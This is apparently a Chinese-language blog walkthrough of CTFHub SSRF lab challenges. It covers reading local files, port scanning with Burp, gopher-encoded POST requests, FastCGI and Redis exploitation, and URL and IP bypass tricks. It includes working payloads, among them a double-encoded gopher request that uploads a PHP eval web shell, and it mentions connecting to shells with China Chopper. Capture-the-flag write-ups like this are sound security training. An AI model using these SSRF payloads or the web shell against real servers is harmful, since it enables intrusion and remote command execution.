内网访问
一.进入页面,选择内网访问
二.开启题目,点击题目中的链接
然后就进来页面了
三.在url里输入
http://127.0.0.1/flag.php就可以得到flag
四.提交flag
伪协议读取文件
一开启题目
二.点击进入链接
三.输入file:///var/www/html/flag.php 然后发现页面不显示,查看页面源代码然后就得到flag
端口扫描
一.开启端口扫描点击如图中链接
二.进入如图所示页面输入http://127.0.0.1:8000
三.打开burp抓包,发送到攻击器
先清除playload然后再8000的地方上添加playload
四.如图所示修改里面的值
五.跑出来之后点开响应包可以查看flag
post请求
一.开启题目,点击题目链接
二.输入http://127.0.0.1/flag.php弹出一个框
打开页面源代码,复制key粘贴到提交框中
三.打开brup抓包,将抓到的数据留下如图所示内容修改为gopher构造post请求数据包
四.将里面内容进行俩次url编码
五.然后关闭抓包,再次回到页面
六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag
上传文件
一.点击开启,点入所给出的链接
二.进入浏览页面输入http://127.0.0.1/flag.php
出现上次文件
发现没有提交按钮,我们自己往上写一个提交按钮
然后我们在自己写1.txt个文件进行提交
三.然后打开brup抓包
在抓包页面进行编辑
四.将抓好的内容进行俩次编码
五. 输入编码
gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交
FastCGl协议
开启题目
打开kali运行如图所示命令 ,利用一句话木马进行base64编码
将上图所得的链接去url编码
然后访问shell.php
打开中国菜刀进行链接
链接成功后可在根目录下查看flag
进行提交flag
redis协议
开启题目
进入kali输入如图所示命令
将kali里给出的链接进行url编码
编码后进行访问
利用菜刀链接网站进入根查看flag
提交flag
urlbypass
进入链接
然后会看到下面有链接,将http://notfound.ctfhub.com输入url里面后面加上@127.0.0.1 /flag.php就会得到flag
数字ip bypass
开启题目,进入链接
在链接后面输入http://0x7f000001/flag.php就可以得出flag
302跳转
点击开启,进入链接
在后面输入http://localhost/flag.php ,然后就得出flag
dns重绑定bypass
开启题目点击进入链接
输入http://localhost/flag.php就可以得到flag
标签:127.0,http,ssrf,0.1,250D%,flag,攻略,链接,cthub From: https://blog.csdn.net/m0_75036923/article/details/141601398